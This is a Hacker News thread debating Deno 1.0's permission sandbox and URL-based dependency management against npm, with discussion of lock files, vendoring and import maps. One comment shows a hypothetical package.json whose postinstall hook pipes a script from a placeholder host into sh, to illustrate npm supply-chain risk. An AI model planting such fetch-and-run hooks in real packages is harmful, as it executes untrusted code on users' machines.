Deno 1.0 (deno.land)
2081 points by theBashShell 20 days ago | 583 comments



> ... Deno is (and always will be) a single executable file. Like a web browser, it knows how to fetch external code. In Deno, a single file can define arbitrarily complex behavior without any other tooling.

> ...

> Also like browsers, code is executed in a secure sandbox by default. Scripts cannot access the hard drive, open network connections, or make any other potentially malicious actions without permission. The browser provides APIs for accessing cameras and microphones, but users must first give permission. Deno provides analogous behaviour in the terminal. The above example will fail unless the --allow-net command-line flag is provided.
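
(For reference, the hello-world server the announcement refers to looks roughly like this, paraphrased from the post, with the std version pinned only for illustration:)

  import { serve } from "https://deno.land/std@0.50.0/http/server.ts";
  const s = serve({ port: 8000 });
  for await (const req of s) {
    req.respond({ body: "Hello World\n" });
  }

Plain `deno run server.ts` fails at the listen call; `deno run --allow-net server.ts` is what grants the socket permission.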

The Deno feature that seems to draw the most fire is dependency management. Some skeptics may be latching onto the first point without deeply considering the second.

Deno is just doing the same thing a browser does: in principle, there's nothing that JavaScript running in sandboxed Deno can do that it couldn't do in a browser. So the security concerns seem a little over the top.

The one caveat is that once you open the sandbox on Deno, it appears you open it for all modules. But then again, that's what NPM users do all the time - by default.

As far as criticisms around module orchestration, ES modules take care of that as well. The dependency graph forms from local information without any extra file calling the shots.

This seems like an experiment worth trying at least.


See the thing about the sandbox is that it's only going to be effective for very simple programs.

If you're building a real world application, especially a server application like in the example, you're probably going to want to listen on the network, do some db access and write logs.

For that you'd have to open up network and file access pretty much right off the bat. That combined with the 'download random code from any url and run it immediately', means it's going to be much less secure than the already not-that-secure NPM ecosystem.


> That combined with the 'download random code from any url

What protection does NPM actually give you?

Sure, they'll remove malware as they find it, but it is so trivially easy to publish packages and updates to NPM, there effectively is no security difference between an NPM module and a random URL. If you wouldn't feel comfortable cloning and executing random Github projects, then you shouldn't feel comfortable installing random NPM modules.

> and run it immediately

NPM packages also do this -- they can have install scripts that run as the current user, and network access that allows them to fetch, compile, and execute random binaries off the Internet.
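
For illustration (hypothetical package name and URL), nothing in npm's publish flow stops a dependency from shipping something like this in its package.json:

  {
    "name": "innocent-looking-lib",
    "version": "1.0.0",
    "scripts": {
      "postinstall": "curl -s https://example.com/payload.sh | sh"
    }
  }

The postinstall script runs with your user's privileges the moment `npm install` pulls the package in.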

From a security point of view, Deno is just making it clear up-front that you are downloading random code snippets, so that programmers are less likely to make the mistake of trusting a largely unmoderated package repository to protect themselves from malware.

I lean towards calling that a reasonably big security win on its own, even without the other sandboxing features.


> What protection does NPM actually give you?

Dependency version pinning comes to mind. The main difference between this and a random URL is that at least you know that if the module gets bought by a third party, your services or build system won't auto update to some rando's version of the package. IIRC there have been cases when a version was replaced as well.

I think this could be fixed quite easily if one could add a hash and a size after the url, to force a check.


I was curious about this so I looked into it. Seems like deno allows for lock files (similar to package-lock.json for NPM) https://deno.land/manual/linking_to_external_code/integrity_...
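
From that manual page, the workflow is roughly as follows (deps.ts here standing in for whichever module pulls in your remote imports):

  # write hashes of every fetched dependency into a lock file
  deno cache --lock=lock.json --lock-write deps.ts

  # later / in CI: re-fetch and fail if anything no longer matches the recorded hashes
  deno cache --reload --lock=lock.json deps.ts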


Yeah, basically sounds like they could implement it à la Content Security Policy in the browser and it would be well understood right off the bat.

Or similar to node_modules, have some way to pull your dependency graph & host locally — At least for enterprise-y adoption I imagine that people will want to have _their_ copy of the code and choose when to update it even if in theory the remote code is locked down.


That is what I figured too. People are rightly concerned about the security implications of this new paradigm of including package dependencies.

These concerns and the conversation around them are good and healthy. Give it some time. People will experiment with what works and over time best practices will emerge for the set of trade offs that people are willing to make.


Arguably you can get (even more reliable) version pinning by copying typescript from that random URL & storing it in your own S3 bucket. Sure, you have _some_ work to do, but it's not that much and you 100% control the code from there on.


Well, I suppose they do (or will) provide a self hosted version of the registry. Like npm does.


If you publish your module versions on IPFS that would provide a guarantee to your users the module versions do not change once published. But hashes are not very memorable as module names.


> If you publish your module versions on IPFS...

Well, using message digests, NPM or Yarn can pretty much guarantee content addressable versions, too. Do not have to use IPFS or blockchains, just because...


A single source of trust for the dependency transport.


> That combined with the 'download random code from any url and run it immediately', means it's going to be much less secure than the already not-that-secure NPM ecosystem.

What deno does is move package management away from the framework distribution. This is great - one thing I hate about node is that npm is default and you get only as much security as npm gives you. (You can switch the npm repo, but it's still the overwhelming favourite because it's officially bundled.)

Deno can eventually give you:

  import lib from 'verified-secure-packages.com'
  import lib from 'packages.cloudflare.com'
So you'll be able to pick a snippet repository based on your risk appetite.


But if lib itself imports from "unsecure-location.com", Deno will access that location and fetch that file.


The idea of the above example is to show that a controlled distribution could be made that verifies all levels of imports if needed, which is very promising.


Both the network and disk access permissions are granular, which means you can allow-write only to your logs folder, and allow net access only to your DB's address.
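
A sketch of what that looks like on the command line (paths and hostname are made up):

  deno run --allow-write=./logs --allow-net=db.internal.example server.ts

Writes outside ./logs, or connections to any other host, still trigger a permission error.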


So it's reimplemented chmod and iptables?


Typically, chmod and iptables are not used to restrict applications. Applications are restricted by virtual machines, containers, sandboxes, AppArmor profiles, SELinux policies…


There's a fairly long history of giving applications their own uid to run under which puts chmod and chown in control of filesystem operations the app is allowed to perform. "Typically" maybe not, but it's hardly unusual.

iptables + namespaces gives you the rest.


+ you can make a network namespace and have separate iptables just for that namespace/app, you can for example give the namespace/app a VPN connection without affecting the rest of the system. And other apps can join the namespace and communicate as if they had their own isolated network.

NodeJS is also working on policies (1), which allow you to assign permissions to single modules or files.

1) https://nodejs.org/api/policy.html


chmod/chown has been the de facto (if not de jure) method securing LAMP stacks for as long as I have been alive. Not that I recommend taking the advice of a LAMP stack too seriously :)


If the de facto method refers to "chmod 777", I wouldn't call that securing ;-)

But indeed, if there is a separate user account for the application, then chmod can be used for some control to its access to files and directories.


A bit more like OpenBSD pledge() and unveil()


> For that you'd have to open up network and file access pretty much right off the bat.

For the network access I have an issue[0] open that asks to separate permissions to listen on the network from permission to dial. Also, along the way I want to have the ability to let the OS pick the port as an option.

Permissions are meant to work by whitelisting. So you wouldn't open access to the whole system just to talk to your DB, or to operate on some files.

[0] https://github.com/denoland/deno/issues/2705


Maybe this will develop into a standard of multi-process servers (real micro services you could say), where the permissions are only given to a slice of the application.


Sounds like privilege separation[1].

[1] https://en.wikipedia.org/wiki/Privilege_separation


That sounds like the Postfix architecture [1]

[1]: https://www.akadia.com/services/postfix_mta.html


Reinventing QNX will always be cutting edge.


QNX is hands down amazing! No car manufacturer could ever come close to having their in-house infotainment system being as snappy as QNX...which is why they gave up and switched to QNX! Fine print: Tesla not included.


Now that would indeed be an interesting way of building servers.


Sometimes it's ok to think "this project isn't for me" and just leave it be. The cynical-security-concern act is boring.


Contrary to the impression I seem to have given you, I'm actually super excited about Deno and am planning to write my next MVP app in it.

That means that I am actually a lot more invested in it, and if I want to put it in production, then I have to be concerned about things like this.

When somebody says they think X is broken, and they present a solution Y which they say is better, I am definitely entitled to ask why they think Y is better when I can't see the difference.


But you don't seem to be genuinely seeking answers, at least not in this thread. You seem already convinced of the project's faults.

You're entitled to your opinion, of course. I had to read through the docs to understand their module system and intent. And I find it very exciting.


Security is literally the main selling point of this thing. Otherwise just use node.


It’s one of the selling points. One of the main points I took away was

“We feel that the landscape of JavaScript and the surrounding software infrastructure has changed enough that it was worthwhile to simplify. We seek a fun and productive scripting environment that can be used for a wide range of tasks.”

Sounds intriguing to me. As a fan of starting projects off as simply as possible, I will certainly be tinkering with Deno.


There are a lot of selling points. To me, the main one is TypeScript with no build step.


  yarn global add ts-node prettier
  echo 'alias deno="ts-node"' >> ~/.zshrc
  echo 'alias deno-fmt="prettier --write"' >> ~/.zshrc
Deno provides a standard library, good defaults, top-level async/await, doesn't break browser compatibility, and a better API for integrating with the runtime.

Internals are nicer, but that's true of anything without ugly legacy.

They are working to get node_modules to work in Deno, so I am kind of worried that it will be Node v2 all over again.


Clearly they have never dealt with JavaScript build tools and npm. A complete nightmare.


Who hasn't? Isn't this precisely one of the pros of Deno?


Yes. That's why I said that.


Promise-based APIs sold me.


Strawman security questions without an understanding of the tool are not very useful.


For the use-case you describe, you're just going to need network access: no file access and no process-forking needed, which is a big attack-surface reduction.

Moreover Idk how granular the network permission is, but if its implementation is smart, you could block almost all outbound network access except connections to your DB and the few APIs you may need to contact.


> means it's going to be much less secure than the already not-that-secure NPM ecosystem.

I have only the bare minimum of like, experience with nodejs. Would you mind fleshing out why that is so?


> For that you'd have to open up network and file access pretty much right off the bat.

I think that overall you're right, but it's worth noting that deno can restrict file system access to specific folders and can restrict read and write separately. It's plausible to me that you could have a web server that can only access specific folders.
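
For example (hypothetical paths), read and write grants can point at different folders:

  deno run --allow-net --allow-read=./public --allow-write=./uploads webserver.ts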


I don't think running a public web server application is one of the envisioned use cases here. It looks like a tool for quickly and dirtily getting some job done. But I agree that to get something useful done, you probably need to open up a bunch of permissions, so you're still running arbitrary code on your machine.


It's always a good idea to run in a container, which limits the ports you can listen on, directories allowed for writing and reading, and can have its own firewall to limit outgoing connections.

If you don't need the firewall, you can just run in a chroot under a low-privilege user.

I mean, if you do otherwise, you are not following best practices and the voice of reason.


The manual looks pretty sketchy, but it seems you can limit file access to certain files or directories and that could be used to just give it access to the database and log files.


Looking at the flags, one can envision future updates providing flags for scoping to directories, PIDs, domain/IP ranges


I don't think that's very accurate. You really need to go watch the first Deno video made by Ryan Dahl at JSConf.


If I am building a real world application I'm going to vet the libraries I use.


Simple solution to the dependency management (spitballing): a directory of files where the filename is the module name. Each file is simply:

  <url><newline><size in bytes><newline><hash>
And then in an application:

  import { serve } from deno.http.server;
If you want nested levels so deno.X.X wouldn't be a ton of files you could possibly just do nested directories so deno/http/server would equate to deno.http.server.

Most people would want the option to do dependency management on a per-project basis as well. Simply allow a command-line parameter to provide one or more other directories to source from first (besides presumably the global one for your installation).

If we wanted the file to be generated automatically, maybe something like this:

  import { serve } from deno.http.server at "https://deno.land/std@0.50.0/http/server.ts";


Until someone thinks that it should follow redirects which probably leads to the same thing that got apt: https://justi.cz/security/2019/01/22/apt-rce.html

Not saying that makes it a bad idea, but importing/downloading trusted code over http(s) is not simple even if the protocol sorta is.


> This seems like an experiment worth trying at least.

Yup! I am really excited about Deno and curious about how popular it will be in a few years.


I guess I'm wondering why Deno is targeting V8 instead of Servo? Maybe I'm mistaken, but Servo [0] and Stylo [1] are both production-ready browser scripting and styling engines implemented in Rust.

[0] https://servo.org/

[1] https://wiki.mozilla.org/Quantum/Stylo


>Servo [0] and Stylo [1] are both production-ready browser scripting and styling engines implemented in Rust.

Servo is absolutely not production-ready. A couple of particular pieces of Servo, such as Stylo and WebRender, can be considered production-ready, but not so much the project as a whole.


Servo uses Firefox's SpiderMonkey, which is written in C++, as its JavaScript implementation.


Servo is an experimental project designed to build and test components that can be integrated into Firefox. It relies on Gecko for JS.


SpiderMonkey, not Gecko.


If you're getting into Deno and want to keep up with new stuff from the ecosystem on a regular basis, we're now publishing https://denoweekly.com/ .. issue 2 just went out minutes after the 1.0 release. I've been doing JavaScript Weekly for 487 issues now, so this is not a flash in the pan or anything :-D

Of course, Deno has an official Twitter account as well at https://twitter.com/deno_land :-)


I suppose .land is the new .dev now ;)

I'm curious how parallelism could be handled in the runtime. Besides exposing WebWorkers, would shared memory be a possibility? V8 looks like it's heading toward a portable WebAssembly SIMD accelerator.

>>> Promises all the way down

Async / await is a great pattern for render loops by resolving to continuous window.requestAnimationFrame calls. Here is a nifty example computing a Buddhabrot and updating new data quite smoothly:

http://www.albertlobo.com/fractals/async-await-requestanimat...
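
The pattern being described, as a minimal sketch (drawNextChunk is a stand-in for whatever incremental work each frame does):

  const nextFrame = () => new Promise<number>((r) => requestAnimationFrame(r));

  // hypothetical incremental work: compute and draw one slice of the fractal per frame
  function drawNextChunk() { /* ... */ }

  async function renderLoop() {
    while (true) {
      await nextFrame();   // resolves on the next animation frame
      drawNextChunk();
    }
  }

  renderLoop();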


Root certificate not trusted for https://denoweekly.com/ on both chrome and firefox.


Maybe they fixed this in the last 2 hours, but it works for me (firefox, linux).


Weird, it still says that "Cisco Umbrella Root CA" is not trusted. Maybe it's only from certain countries.


I'm Canadian and in Canada for what it's worth. Clicking on the lock tells me that it was verified by lets encrypt. The root is "Digital Signature Trust Co." Common Name "DST Root CA X3".

Cisco sounds like a router might be running a MITM on you?

Edit: This looks to be confirmation that that root (or one by a very similar name) is used by a MITM tool:

https://docs.umbrella.com/deployment-umbrella/docs/rebrand-c...


Thanks for the diagnosis. Accessed from a different network and with no issues. And got the right certificate this time.


Same. FF/macOS


Hmm, interesting! Thanks for the report. I just ran it through Qualys SSL Labs and everything passed. (We got a B though because we still support TLS 1.1.)

It's a multi-domain Let's Encrypt X3 certificate and I believe most LE users will be in a similar boat now.


Keep up the good work, JS weekly is a wonderful resource.


Good to see you here!


right on top of it Peter! nice


Great :)


> TSC must be ported to Rust. If you're interested in collaborating on this problem, please get in touch.

This is a massive undertaking. TSC is a moving target. I occasionally contribute to it. It’s a fairly complex project. Even the checker + binder (which is the core of TS) is pretty complex.

One idea that comes to mind is to work with the TypeScript team so that they only use a subset of JS, such that tsc can be compiled down to WebAssembly and LLVM can spit out a highly optimized binary. This not only benefits Deno, but the rest of the internet.

TSC has done some great architectural changes in the past like doing mostly functional code, rather than lots of classes.

The target we should be aiming for is a powerful typed language like TypeScript that compiles very quickly to WebAssembly and can run in guaranteed sandbox environments.


There already exists an experimental compiler that takes a subset of TypeScript and compiles it to native code[1]. It might be able to target wasm instead of asm.

Also: If I'm not entirely mistaken Microsoft initially planned to have a TypeScript-specific interpreter in Explorer. This also might indicate that something like that could be possible.

1: https://www.microsoft.com/en-us/research/publication/static-...


I wonder how possible it would be to just use this:

https://github.com/swc-project/swc

It's still not feature-complete, but there aren't any alternatives written in Rust that I know of.


SWC does not do any typechecking. It is equivalent to babel.



This does seem like a dangerous side-path unrelated to the Deno project's needs.

From the description, it doesn't sound like Deno needs the type information for V8 optimizations (I thought they had explored that, but I don't recall, and the description here is unclear), so maybe switch to more of a two-pass system: an as-simple-as-possible "type stripper" (like Babel's, perhaps?) for execution, and leave tsc compilation for type checking as a separate background process. Maybe put it behind some sort of "production mode" flag, so that type errors stop debug runs but production assumes you can strip types without waiting for a full compile?

Maybe even writing a type stripper in Rust isn't a bad idea, but definitely trying to capture all of tsc's functionality in Rust seems like a fool's errand.


Typescript already has transpile-only mode that lets it run without performing those checks and just emit.

I use it with ts-node all the time for my docker images that require fast startup.

  node -r ts-node/register/transpile-only xyz.ts


v8 has the ability to snapshot a program just after it loads, but before it executes. If you snapshot after doing some kind of warmup, to trigger the right optimisations, you get something that should fire up ready to go, which is probably the main problem - the compiler being repeatedly invoked and parsed from javascript and compiled on the fly.


One problem with taking the V8 snapshot and using it as a binary executable is that it will probably be much slower than running V8 live. Although the startup time will be 10x faster, the runtime will be 10x slower.


The notes here mention that V8 snapshots also didn't provide the speed-up/optimization Deno was hoping for.


There is https://github.com/AssemblyScript/assemblyscript. It's not using llvm, but it's compiling a subset of typescript to webassembly.


I see the sass / node-sass fiasco all over again...


This is referring to lib-sass being in C?


The dependency management is highly questionable for me. Apart from the security concerns raised by others, I have huge concerns about availability.

In its current form, I'd never run Deno in production, because dependencies have to be loaded remotely. I understand they are fetched once and cached, but that will not help me if I'm spinning up additional servers on demand. What if the website of one of the packages I depend on goes down, just as I have a huge spike in traffic?

Say what you want about Node's dependency management, but at least I'm guaranteed reproducible builds, and the only SPOF is the NPM repositories, which I can easily get around by using one of the proxies.


Why can't you download all the packages you use actually with your source code? That's how software has been built for decades...

I'm a desktop developer so I understand I'm the dinosaur in the room but I've never understood why you would not cache all the component packages next to your own source code.

Since this is straightforward to do I presume there is some tradeoff I've not thought about. Is it security? Do you want to get the latest packages automatically? But isn't that a security risk as well, as not all changes are improvements?


For Node, the main tradeoff is number and size of files. Usually the distribution of a node module (that which is downloaded into node_modules) contains the source, documentation, distribution, tests, etc. In my current project, it adds up to 500MB already.

They would do well to have an option to optimize dependencies for vendoring.


You're right. We call this "vendoring" your dependencies. And it's a good way to do things.


You can commit your node_modules folder into your repository if you'd like.


That is exactly what NPM does.


So build your own npm?


Hi! The response to your fears is in the announcement: "If you want to download dependencies alongside project code instead of using a global cache, use the $DENO_DIR env variable." Then, it will work like node_modules.
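
A sketch of that workflow (deps.ts and main.ts are hypothetical entry points):

  # fetch everything into a project-local cache instead of the global one
  DENO_DIR=./deno_dir deno cache deps.ts

  # run against the same local cache, refusing any further network fetches
  DENO_DIR=./deno_dir deno run --cached-only main.ts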


Ah, in this case, I would then have to commit my dependencies into my VCS to maintain reproducible builds. I'm not sure I like that solution very much either. I've seen node_modules in multiple GBs, and I'm sure Deno's dependency sizes are going to be similar.


True, but that's what people using Go have been doing for years without complaining much, so I guess it works fine for most workload.

And before npm fixed things after the left-pad incident, npm builds were not reproducible either (as demonstrated by the said left-pad incident).


> True, but that's what people using Go have been doing for years without complaining much, so I guess it works fine for most workload.

I hate to break it to you but dependency management has been a massive issue in golang until the devs formally adopted go mod.

Only Google seemed okay with checking in their dependencies to version control. Everyone else was doing crazy hacks like https://labix.org/gopkg.in


Checking in dependencies to version control is the sane option. Then you can more easily see what's updated and track regressions. Some people like to refactor their code any time some syntax sugar is added to the language - often adding a few bugs while doing it, which is a PITA, but version control is still better than no version control.

You will ask, what about adding the OS to your SCM too - why not have the full software stack? But you can generally draw a line between strong abstraction layers: Hardware | Kernel | OS | runtime | your app. Some modules do have strong abstraction layers, but others are just pure functions which you could just as well copy into your own repo.


It created a hugely fractured open source ecosystem as well.


The vendoring has never been the issue though.


I have only used Go once at work, and I actually dislike most of it (and dependency management was one of the annoying things with Go); nonetheless it has never been a show stopper, and there have been thousands of developers using it when vendoring was the only option.


Dependency management is one of the biggest complaints I have seen around Go - I don't think this is accurate.


I don't like it either, but it still works well enough for many people.


Go dependency management is quite good now with "go mod", plus your dependency tree isn't going to look anything like your typical JavaScript dependencies; otherwise you're doing it wrong.


> that's what people using Go have been doing for years without complaining

I haven't seen anyone commit vendor and not complain about it. But now you finally don't have to commit vendor for reproducible builds. All you need is a module proxy. The "all you need" is not really meant seriously of course.

And I personally prefer to not commit vendor and complain about it.


Go compiles to a static binary. It’s not downloading and running source on your production servers. Isn’t that the concern here?


That is one of the things I hate about go. Right up there with lack of generics and boilerplate error handling.


This hasn't been a thing in Go for a long time. Go dep and now go modules fix this.


You could use a separate git repository for the dependencies. That way you keep your core project repo tight and small and clean, but you still have your dependencies under version control. If that separate repo grows to a few GBs or more it doesn't really hurt anything.


In practice modules will be available from sources that will have similar reliability to npm: github.com, unpkg.com, cdn.pika.dev, jspm.io, etc.


Which then raises the question - how is it better than NPM? If there are going to be centralized repositories (like NPM), and if I have to download my dependencies into a $DENO_DIR (like NPM), and if I am then loading these dependencies from local files (like NPM), how is it any different to NPM? Except for being less secure by default?

This is starting to look like a case of being different just so you can say you're different.


NPM is a dependency management failure which is why you are ending up with hundreds of dependencies in the first place. It sounds like you want to reproduce that insanity in Deno. Deno is set up in such a way to dissuade you from the stupidity by default but allow it in very few steps if you cannot imagine a world without it.

In my opinion this is Deno’s biggest selling point.


> Deno is set up in such a way to dissuade you from the stupidity by default but allow it in very few steps if you cannot imagine a world without it.

Could you elaborate on this? Is it that Deno is against the whole 'small packages that do one thing well' principle and instead in favor of complete libraries? How exactly would it dissuade me from installing hundreds of dependencies?


The default design style for a Deno application is that the application becomes a single file. Just like packages coming off Steam. This requires that dependencies are packaged into the application before it is distributed to others. The idea there is to include only what you need, deliberately, and manage it as a remotely written extension of your application.


Having a single executable file makes distribution easier, but while I'm developing the app, I'll still have to manage all of its dependencies, right? How does Deno aid during development?

> The idea there is to include only what you need deliberately and it manage it as a remotely written extension of your application.

I have a node app, in which I deliberately only included the dependencies I need. The package.json lists exactly 8 dependencies. However, the node_modules folder already has 97 dependencies installed into it. The reason of course is that these are dependencies of dependencies of dependencies of dependencies.

Wouldn't Deno have this same issue? Are the dependencies also distributed in compiled form as a single file akin to windows DLLs?


it's better because there will be more choice.


I am always confused by deno folks. You can install from a git repository using yarn/npm.

How is that not "decentralisation"

And if you are importing single files from a remote url, I would question your sanity.


> install from a git repository using yarn/npm

yep, that's basically the same. deno has the benefit of using the es module system like it is implemented in browsers.


Node supports node_modules, not npm. Anything can build the node_modules.


Doesn't this mean more opportunities to inject malicious code?


Only if you tell your application to retrieve from untrusted locations.


To solve your issue, you would do exactly how you do your node deployments: download the deps in a folder in CI, then deploy the whole build.


Except that now, the download deps in CI step can fail if one of hundreds of websites for my hundreds of dependencies goes down. If the main NPM repository goes down, I can switch to a mirror and all of my dependencies will be available again.


To be the rubber duck, if wiping the cache at each build is a risk to your CI, what could you do to keep your CI up?

1 - not wipe the cache folder at each build? It's easy and secure. Oh and your build will be faster.

2 - use a cached mirror of the deps you use? It's like 10min to put in place and is already used in companies that care about security and availability anyway.

3 - you have https://deno.land/x if you want to put all your eggs in the same npm basket


Yes, I think I'd probably settle for solution number 2.

I still don't understand how this is better than NPM, and how Deno solves the horrible dependency management of Node, but maybe if I actually build something with Deno I'll get some answers.


From the post:

> [With NPM] the mechanism for linking to external libraries is fundamentally centralized through the NPM repository, which is not inline with the ideals of the web.


> which is not inline with the ideals of the web

Subjective.

> Centralized currency exchanges and arbitration is not in line with the ideals of the web! - Cryptocurrency

Nek minute. Besides, let's get real here; they will just end up centralized on GitHub. How exactly is that situation much different from npm or any other language ecosystem's library directory being mirror-able?


The centralization of git on Github is completely different in nature from the centralization of Node packages on npm.

git does not require Github to be online to work, nor does it rely on Github's existence for its functionality.


I'm talking about the centralization of software packages(Go, Deno) on GitHub as it applies to dependency resolution.


I'd highly recommend mirroring packages anyway. Obviously this isn't always necessary for small projects, but if you're building a product, the laws of the universe basically mandate that centralized package management will screw you over, usually at the worst possible time.


You answered your own question. Nothing stops you from using a mirror with deno too.


Which again brings me back to something I'm still not understanding - How is Deno's package management better than NPM if it is extremely similar to NPM, but slightly less secure?

I'm only asking because lots of people seem to be loving this new dependency management, so I'm pretty sure I'm missing something here.


We need to distinguish between npm, the service (https://www.npmjs.com/) and npm, the tool.

Deno has the functionality of npm, the tool, built-in.

The difference is that like Go, Deno imports the code directly from the source repository.

In practice it's going to be github.com (but can be gitlab or any code hosting that you, the author of Deno module, use).

NPM is a un-necessary layer that both Go and Deno has removed.

It's better because it's simpler for everyone involved.

In Go, I don't need to "publish" my library. People can just import the latest version or, if they want reproducibility, an explicit git revision. Compared to Go, publishing to npm is just unnecessary busy work.

I've seen JavaScript libraries where every other commit is related to publishing a new version to npm, littering the commit history.

In Go there's no need for package.json, which mostly replicates the information that was lost when publishing to npm (who's the author? what's the license? where's the actual source repository?).

As to this being insecure: we have over 10 years of experience in the Go ecosystem that shows that in practice it works just fine.


How do you list the dependency libraries if you don't have a package.json?

Do you manually install a list of libraries provided by the author's readme?


The simplest approach is to either import anything anywhere, or have a local module that imports external dependencies and then have your code import them via that local module.


The dependencies are imported in the source code of the package.


NPM, the tool, has had the ability to install directly from GitHub instead of npmjs.org for many many years as well. No one really used it except as a workaround for unpublished fixes, because it has no other tangible benefits.


I like it because it's simpler. I know what happens when I import from a URL. I'd have a hard time whiteboarding exactly what happens when I `npm install`.


What happens?


My least favorite thing about importing from NPM is that I don't actually know what I'm importing. Sure, there might be a GitHub repository, but code is uploaded to NPM separately, and it is often minified. A malicious library owner could relatively easily inject some code before minifying, while still maintaining a clean-looking repo alongside the package.

Imports from URL would allow me to know exactly what I'm getting.


install from the repo then?

You can install a specific version from git via yarn/npm.

How do you trust a url more without reading the code?

What's going to stop the Deno ecosystem from putting minified JS files on CDNs and importing them?


It's decentralized.


Or use something like Nexus or Artifactory to host a private copy of dependencies.


I think the primary way to manage dependencies should be in a local DIR and optionally, a URL can be specified.

The default in Deno is a questionable choice. Just don't fuck with what works. The default should be the safest option, with developers optionally enabling less safe behaviors.


Using a universally unique identifier like a URL is a good idea: this way, https://foo.com/foo and https://bar.com/foo are distinct and anyone who can register their own name gets a namespace, without relying on yet another centralized map of names->resources.

After all, the whole point of a URL is that it unambiguously identifies resources in a system-independent way.


No one is questioning the utility of URLs. Using URLs to specify dependencies right in the import statement is a horrible idea.


How is it any worse than using names from a namespace controlled by “npmjs.com”: if you’re concerned about build stability, you should be caching your deps on your build servers anyways.


I've never used npm or developed any javascript before but it sounds equally horrible.

Not decoupling the source of the package (i.e., the location of the repository, whether remote or local) from its usage in the language is a terrible idea.

  from foo import bar
  # foo should not be a URL. It should just be an identifier.
  # The location of the library should not be mangled up in the code base.

Are we going to search-and-replace URL strings in the entire codebase because the source changed? Can someone tell me what the upside of this approach is, because I cannot see a single one but many downsides.


The whole idea of a URL is that it’s a standardized way of identifying resources in a universally unique fashion: if I call my utility library “utils”, I’m vulnerable to name collisions when my code is run in a context that puts someone else’s “utils” module ahead of mine on the search path. If my utility module is https://fwoar.co/utils then, as long as I control that domain, the import is unambiguous (especially if it includes a version or similar.).

The issue you bring up can be solved in several ways: for example, xml solves it by allowing you to define local aliases for a namespace in the document that’s being processed. Npm already sort of uses the package.json for this purpose: the main difference is that npmjs.com hosts a centralized registry of module names, rather than embedding the mapping of local aliases->url in the package.json


Allow me to provide an extremely relevant example (medium sized code base).

About 100 python files, each one approximately 500-1000 lines long.

Imagine in each one of these files, there are 10 unique imports. If they are URLs (with version encoded in the URL):

- How are you going to pin the dependencies?

- How do you know 100 files are using the same exact version of the library?

- How are you going to refactor dependency resolution or handle upgrades, maintenance, deprecation?

How will these problems be solved? Yes, I understand the benefit of the URL - it's a unique identifier. You need an intermediate lookup table to decouple the source from the codebase. That's usually requirements.txt, poetry.lock, pipenv.lock, etc.


I believe the long term solution to the issues you raised is import maps: https://github.com/WICG/import-maps

It's an upcoming feature on the browser standards track gaining a lot of traction (deno already supports it), and offers users a standardized way to maintain the decoupling that you mentioned, and allows users to refer to dependencies in the familiar bare identifier style that they're used to from node (i.e. `import * as _ from 'lodash'` instead of `import * as _ from 'https://www.npmjs.com/package/lodash'`).

I imagine tooling will emerge to help users manage & generate the import map for a project and install dependencies locally similar to how npm & yarn help users manage package-lock.json/yarn.lock and node_modules.
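
As a sketch of what that could look like (the mapping and module URL are invented; in Deno 1.0 import maps sit behind the --unstable flag):

  // import_map.json
  {
    "imports": {
      "my-utils/": "https://example.com/my-utils@1.2.0/"
    }
  }

  // app.ts -- back to bare-ish specifiers
  import { leftPad } from "my-utils/strings.ts";

  // run: deno run --importmap=import_map.json --unstable app.ts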


The Deno docs recommend creating a deps.ts file for your project (and it could be shared among multiple projects), which exports all your dependencies. Then in your application code, instead of importing from the long and unwieldy external URL, import everything from deps.ts, e.g.:

    // deps.ts
    export {
      assert,
      assertEquals,
      assertStrContains,
    } from "https://deno.land/std/testing/asserts.ts";

And then, in your application code:

    import { assertEquals, runTests, test } from "./deps.ts";
https://deno.land/manual/linking_to_external_code#it-seems-u...


This was my first instinct about how I'd go about this as well. I actually do something similar when working with node modules from npm.

Let's say I needed a `leftpad` lib from npm - it would be imported and re-exported from `./lib/leftpad.js` and my codebase would import leftpad from `./lib`, not by its npm package name. If/when a better (faster, more secure, whatever) lib named `padleft` appears, I would just import the new one in `./lib/leftpad.js` and be done. If it had an incompatible API (say, reversed order of arguments) I would wrap it in a function that accepts the original order and calls padleft with the arguments reversed, so I wouldn't have to refactor imports and calls in multiple places across the project.
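
A sketch of that wrapper in Deno-flavored TypeScript (the URL and the padLeft signature are invented for the example):

  // lib/leftpad.ts -- the only file that knows where the dependency lives
  import { padLeft } from "https://example.com/padleft@2.0.0/mod.ts";

  // keep the signature the rest of the codebase already uses
  export function leftpad(s: string, len: number, ch = " "): string {
    return padLeft(len, s, ch); // adapt the reversed argument order
  }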


Yeah, this sort of "dependency injection" scheme is better than having random files depend on third party packages anyways: it centralizes your external dependencies and it makes it easier to run your browser code in node or vice-versa: just implement `lib-browser` and `lib-node` and then swap them out at startup.


Yeah, I agree, but that intermediate lookup table (a) can be in code and (b) can involve mapping local package names to url package names.

One-off scripts would do `from https://example.com/package import bar` and bigger projects could define a translation table for the project (e.g. in __init__.py or similar).

Embedding this sort of metadata in the runtime environment has a lot of advantages too: it's a lot easier to write scripts that query and report on the metadata if you can just say something like `import deps; print(deps.getversions('https://example.com/foo'))`

One of the best parts about web development is that, for quick POC-type code, I can include a script tag that points at unpkg.com or similar and just start using any arbitrary library.


That's exactly what Go does - it works fine


Good luck finding which of foo.com/foo or bar.com/foo is the foo module you want though…


Good luck finding which of google.com/search or bing.com/search is the search engine you want though


This is true actually, and that's why being the default search engine is so important that Google pays billions each year for it.


It could be a good idea if they were immutable, like IPFS links.


That might work for some projects, but can quickly blow up the size of the repo.

I don't think it is an unsolvable problem. For example, other solutions could be using a mirror proxy to get packages instead of fetching directly from the source, or pre-populating the Deno dir from an artifact store. It would be nice to have documentation on how to do those, though.


A better solution is something like https://vfsforgit.org/


That's not necessarily better. For one thing, it doesn't support Linux yet. For another, afaik, Azure DevOps is the only git hosting service that supports it.

Even if it was better supported, I wouldn't want to start using it just so I can include all my dependencies in git. Of course if you are using something like vfs for git anyway, then increasing the repo size is less of an issue. It still feels wrong to me though.


Yeah, I'm not really advocating the use of GVFS specifically, but what I am saying is that once you've lived in a world where all your dependencies are in your repo you won't want to go back, and that Git should improve their support for large repos (in addition to checking in all our dependencies, we should be able to check in all our static assets).


It's just a URL right? So could you not mirror the packages to your own server if you're so concerned, or better yet import from a local file? Nothing here seems to suggest that packages must be loaded from an external URL.


> or better yet import from a local file

And this is different from NPM how? Except that I've now lost all the tooling around NPM/Yarn.


It's different because it is much further removed from a centrally controlled dumpster fire. The JS, Node and NPM ecosystem is a pain on so many levels. Blindly trusting developers to follow semver by default. Leftpad. Build toolchains. The whole micro-dependency madness. Having a peek into your node_modules is like looking into the depths of hell.

